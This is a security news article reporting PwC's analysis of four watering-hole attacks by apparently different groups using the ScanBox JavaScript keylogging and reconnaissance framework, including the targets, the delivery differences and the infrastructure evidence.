Four Distinct Watering Hole Attacks Dropping ScanBox Keylogger

PwC has published research on four watering hole attacks likely carried out by different attackers, all connected by the ScanBox JavaScript-based reconnaissance tool.

The appearance of the ScanBox keylogging tool in August ushered in a new era of reconnaissance tools used in targeted attacks. No longer was a malware infection required to steal information from a victim of interest. Instead, attackers using watering hole attacks, were loading malicious JavaScript onto a compromised website; the JavaScript, i.e., ScanBox, was a keylogger that snagged all of a user’s typed activity on the infected watering hole website.

“ScanBox is particularly dangerous as it doesn’t require malware to be successfully deployed to disk in order to steal information – the keylogging functionality simply requires the JavaScript code to be executed by a web browser,” wrote Chris Doman and Tom Lancaster of PwC. Their published report Monday revealed four separate attacks—each carried out by different attackers—using ScanBox against varied targets.

ScanBox, reported by AlienVault Labs in August, is primarily a reconnaissance tool that, in addition to the keylogger, enumerates software installed on the system, including security software, Adobe Flash and Reader versions, Office version and Java versions. All of this system information is encrypted and sent via a backdoor connection to a command and control server.

“This is a very powerful framework that gives attackers a lot of insight into the potential targets that will help them launching future attacks against them,” wrote AlienVault Labs director Jaime Blasco.

PwC, meanwhile, took the ball and ran with it, identifying a number of the other attacks where ScanBox has been deployed. All of the attacks relied on a watering hole to spread ScanBox. The targets, however, went beyond the industrial target uncovered by AlienValult in August. One month later, the code was used in China in attacks targeting Uyghur activists in a compromise of code[.]googlecaches[.]com, and again in two other attacks in October. The first was against a U.S. government think tank via a compromise of news[.]foundationssl[.]com and another against a hospitality site in South Korea qoog1e[.]com.

“This variation was our first clue that more than one actor may be using the framework (although on its own this would not be enough – some actors do target a wide range of organisations, some also focus on specific geographies or sectors),” Doman and Lancaster wrote.

The PwC researchers said they noticed implementation differences in the same codebase, alerting them that different actors may be using the same code. There were differences in how the malicious code was delivered on two of the sites versus the other two. In two attacks, for example, the malware was delivered as a single block of code, while in the other two, it was delivered via plug-ins.

Analysis of the attackers’ respective infrastructure gave other clues that multiple groups had taken a liking to ScanBox. None of the four attacks used the same nameserver or malware families, while the only visible overlap is that two attacks used GoDaddy as a domain registrar.

“We have been unable to identify any direct overlaps between the clusters, i.e. shared domains or IP addresses, neither have we been able to determine any softer linkages beyond the reuse of the GoDaddy registrar,” the PwC report said.

As in other attacks, some threat actors share resources from centralized state-sponsored or criminal development teams or exploit kits are outright stolen from public watering holes by other attack groups, PwC. Or it could be the same group behind all four attacks and that same group targets widely and adapts code for different targets, Doman and Lancaster said.

“In our view, the hypothesis with the highest probability is that groups of attackers share resources leading to overlaps – this appears to be an ever more common feature – with malware families, builders, and even sometimes hosting infrastructure being shared between disparate actors with a common goal,” Doman and Lancaster said. “Sharing frameworks like ScanBox or other exploit kits allows less sophisticated actors (who were themselves unable to develop a tool like ScanBox) to conduct better attacks.”

Suggested articles